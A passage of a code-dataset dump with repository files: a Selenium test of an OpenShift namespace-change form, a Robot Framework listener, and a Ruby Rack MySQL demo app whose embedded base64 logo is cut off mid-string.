"9506f38b8cbf0746fea3e05c70be4063a0614504", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2620, "license_type": "no_license", "max_line_length": 163, "num_lines": 62, "path": "/automation/open/testmodules/UI/web/US1797_135723.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\n#import unittest, time, re\n#import baseutils\n#import HTMLTestRunner\n\nclass US17971357232(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n self.confirm_link=self.cfg.confirm_url_express\n\n \n def test_u_s17971357232(self):\n driver = self.driver\n baseutils.login(self,self.cfg.new_user,self.cfg.password)\n if (not baseutils.has_domain(self)):\n baseutils.setup_domain(self)\n if (not baseutils.has_sshkey(self)):\n baseutils.setup_default_sshkey(self)\n\n baseutils.go_to_account_page(self)\n driver.find_element_by_link_text(\"Change your namespace...\").click()\n##\n for t in baseutils.Invalid_input:\n driver.find_element_by_id(\"domain_name\").clear()\n driver.find_element_by_id(\"domain_name\").send_keys(t)\n driver.find_element_by_id(\"domain_submit\").click()\n baseutils.assert_text_equal_by_xpath(self, \"Only letters and numbers are allowed\",\"id('app-errors')/p\")\n time.sleep(2)\n##\n used_domain=self.cfg.exist_domain\n driver.find_element_by_id(\"domain_name\").clear()\n driver.find_element_by_id(\"domain_name\").send_keys(used_domain)\n driver.find_element_by_id(\"domain_submit\").click()\n baseutils.assert_text_equal_by_xpath(self, \"Namespace '%s' already in use. 
Please choose another.\"%used_domain,\n \"id('domain_name_group')/div/div[1]/p\")\n new_domain=baseutils.get_random_str(10)\n print \"DEBUG:\", new_domain\n driver.find_element_by_id(\"domain_name\").clear()\n driver.find_element_by_id(\"domain_name\").send_keys(new_domain)\n driver.find_element_by_id(\"domain_submit\").click()\n baseutils.wait_element_present_by_link_text(self, \"Change your namespace...\")\n baseutils.assert_text_equal_by_xpath(self, \"http://applicationname\"+u\"\\u2013\"+\"%s.rhcloud.com\"%new_domain, \"id('content')/div[2]/div[1]/section[2]/div[1]\")\n \n \n def is_element_present(self, how, what):\n try: self.driver.find_element(by=how, value=what)\n except NoSuchElementException, e: return False\n return True\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.6349614262580872, "alphanum_fraction": 0.637532114982605, "avg_line_length": 23.3125, "blob_id": "9b354d06005c103031486ec600166fdeffd5f65f", "content_id": "62c20305ad4d6279d75e7e699b4779e467d1b8d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 389, "license_type": "no_license", "max_line_length": 74, "num_lines": 16, "path": "/listenertest/simplelister.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "ROBOT_LISTENER_API_VERSION = 2\n\ndef start_test(name, attrs):\n print 'Executing test %s' % name\n\ndef end_test(name, attrs):\n print ' ******End test %s ***** ' % name\n\ndef start_keyword(name, attrs):\n print 'Executing keyword %s with arguments %s' % (name, attrs['args'])\n\ndef log_file(path):\n print 'Test log available at %s' % path\n\ndef close():\n print 'All tests executed'\n" }, { "alpha_fraction": 0.5727759599685669, "alphanum_fraction": 0.5990313291549683, "avg_line_length": 23.216049194335938, "blob_id": "988569736f200f022409d63e00ff01a38ccd0803", "content_id": "cd195522a8612fef712a94010ec4d000d1b2a1c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 3923, "license_type": "no_license", "max_line_length": 196, "num_lines": 162, "path": "/automation/open/testmodules/RT/cartridge/app_template/mysql/config.ru", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "require 'rack/lobster'\nrequire 'mysql'\n\nmap '/mysql' do\n content = \"GEAR DNS: \" + ENV['OPENSHIFT_GEAR_DNS'] + \"<br />\"\n begin\n dbh = Mysql.real_connect(ENV['OPENSHIFT_MYSQL_DB_HOST'], ENV['OPENSHIFT_MYSQL_DB_USERNAME'], ENV['OPENSHIFT_MYSQL_DB_PASSWORD'], ENV['OPENSHIFT_APP_NAME'], ENV['OPENSHIFT_MYSQL_DB_PORT'].to_i)\n dbh.query(\"DROP TABLE IF EXISTS ucctalk\")\n dbh.query(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\")\n dbh.query(\"INSERT INTO ucctalk (speaker,title) VALUES ('Jeremy Zawodny', 'Optimizing MySQL'), ('Sanja Byelkin', 'Sub-Queries in MySQL'), ('Tim Bunce', 'Advanced Perl DBI')\")\n content += \"<p>#{dbh.affected_rows} rows were inserted:</p>\"\n res = dbh.query(\"SELECT * FROM ucctalk\")\n while row = res.fetch_row do\n content += row.join(\", \")+\"<br />\"\n end\n res.free\n rescue MysqlError => e\n content += \"Error code: #{e.errno}\"\n content += \"Error message: #{e.error}\"\n ensure\n dbh.close if dbh\n end\n mysql = proc do |env|\n [200, { \"Content-Type\" => \"text/html\" }, [content]]\n end\n run mysql\nend\n\nmap '/health' do\n health = proc do |env|\n [200, { \"Content-Type\" => \"text/html\" }, [\"1\"]]\n end\n run 
health\nend\n\nmap '/lobster' do\n run Rack::Lobster.new\nend\n\nmap '/' do\n welcome = proc do |env|\n [200, { \"Content-Type\" => \"text/html\" }, [\"<!doctype html>\n<html lang=\\\"en\\\">\n<head>\n <meta charset=\\\"utf-8\\\">\n <meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge,chrome=1\\\">\n <title>Welcome to OpenShift</title>\n <style>\n html { background: black; }\n body {\n background: #333;\n background: -webkit-linear-gradient(top, black, #666);\n background: -o-linear-gradient(top, black, #666);\n background: -moz-linear-gradient(top, black, #666);\n background: linear-gradient(top, black, #666);\n color: white;\n font-family: 'Liberation Sans', Verdana, Arial, Sans-serif;\n width: 40em;\n margin: 0 auto;\n padding: 3em;\n }\n a {\n color: #bfdce8;\n }\n \n h1 {\n text-transform: uppercase;\n -moz-text-shadow: 2px 2px 2px black;\n -webkit-text-shadow: 2px 2px 2px black;\n text-shadow: 2px 2px 2px black;\n background: #c00;\n width: 22.5em;\n margin: .5em -2em;\n padding: .3em 0 .3em 1.5em;\n position: relative;\n }\n h1:before {\n content: '';\n width: 0;\n height: 0;\n border: .5em solid #900;\n border-left-color: transparent;\n border-bottom-color: transparent;\n position: absolute;\n bottom: -1em;\n left: 0;\n z-index: -1000;\n }\n h1:after {\n content: '';\n width: 0;\n height: 0;\n border: .5em solid #900;\n border-right-color: transparent;\n border-bottom-color: transparent;\n position: absolute;\n bottom: -1em;\n right: 0;\n z-index: -1000;\n }\n h2 { \n text-transform: uppercase; \n margin: 2em 0 .5em;\n }\n \n pre {\n background: black;\n padding: 1em 0 0;\n -webkit-border-radius: 1em;\n -moz-border-radius: 1em;\n border-radius: 1em;\n color: #9cf;\n }\n \n ul { margin: 0; padding: 0; }\n li {\n list-style-type: none;\n padding: .5em 0;\n }\n </style>\n</head>\n<body>\n <img\n alt=\\\"OpenShift logo\\\"\n 
src=\\\"data:image/png;base64,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\nFC4iARmjflSvrIi
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
IjoHlS9MrY/NJbc3\n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\nMRB4FvgucA6wNGk7H8nycQhed9C
leC20x/1DZX04vki8CNyINw62IGk7wazXCPAp////BM4CmHJo\n7Lmp8diC4w8Z8veT47HsCvv5wPos8QiutSkRj+X9WiRtR5K2cw/eDNvjgIeTtjPLrxQAHAg8knNa\nAvjvLBtjgVeATwNfAu4FiKaNWQEcitfMzUvamOCYfdbYurK/uxljvIk8wqMgdwTpYmhVpfGlI2pX\nV3JsImP88S9jtp911Iis2suISrkAvI7lATm1yjNGH7T8oaVrfoTID1Tc3yCRr/RU6y2FUw47uBn4\nMXDTQ8vWThU4R2EafoAAQOQE4NZy/LgGcj6a+84aW/ef2QkPLVvbRFb/q5suPwzvemYqSDtpMLtb\nRwL/1Hbz8ew86aNG7JHZUE10flbeZc7AezaCtU/nJuIxhV21dCdpO3WJeCyo1Z6Zdfw/gOak7dQk\n4rGWRDy2LWk7X8ETnleB7ybisX8WUIY3gE8l4jE3aTvfBdYnbeeYRDz2fNJ2ZgHnAtf7eacBDxY6\nMOwLzjS86e1Bzfq7wPOJeOxiP885wBXAP/zj1wF/ScRj3/KPfwh4mu672oYkbefbOWkdptT7rapx\nWffvbuDxpO38KBGPpZO2cznwX4l47IICLm0MXlddMZyP16V2cCIea/U/qyXAecCfCrTxY+CWRDx2\nk38NZwMfjqaNWYTXb3kh8Mt8Z6aNudD/t6BmaU+kjdelpGBPP2JEp8Vg7ZsavAAAB9RJREFUZ1XC\nSRbt/hf13fi6Br6qs9I2tb1x8wHVA6erMA4yFVkcmc2spU1XYxirEffGaWPjjWeNrZsPzL//laYn\nRPhrVtYDy/WVzunCyhfTU8Z0+MZF8uQp2q/J3w1Zlk1AOwbxzLkdKhh7lvYCBSTZ6MxQv4InlvUz\nNeaip+pjXxi7bFl0YK9Bv5saH3JhTzaA85O2M8n//wigFbgg4dduE/GYJm3nULwujhfwuijG43eL\n+MfHAKOAfwE2XlBq8Y/f6Qf9bwBzkrbzd+CbiXhsVTdlejGY3ZSIxzYnbecF4Bi8LrU/4i1Qvd7P\nO52eF97+Jmk72YtaZwPHJeKxoAZzOnBZzvGfJ20n6uc5gaxZpol47J9J2+nBJVVATU5a3jGXpO1M\nxBOX5/C+i8OANT05yGGgf34xfAyYk4jHWgES8diOpO08gddVV6iAnIC30DzgWYBouzG/wlsHctQ9\nL6/66nnjRt6SfdY9L686GzgTL/7eXGTB89KeySBIxWuUXZF2vRZIJfrNC/W1MytsXjJxYvpPL9qX\niPA0XjO1Yvzx5TWHWJjrgT5k5Px7Xl71miCLwLSDfDT7kkXKW2kPnQUkHxm344xH1ypfQoJnJqAi\nYyDtaTRrfKbYsZ2y/buFzQxN1Me+1mA7v5W03pwYM7ipoXHT7OPtTbOpHtRP0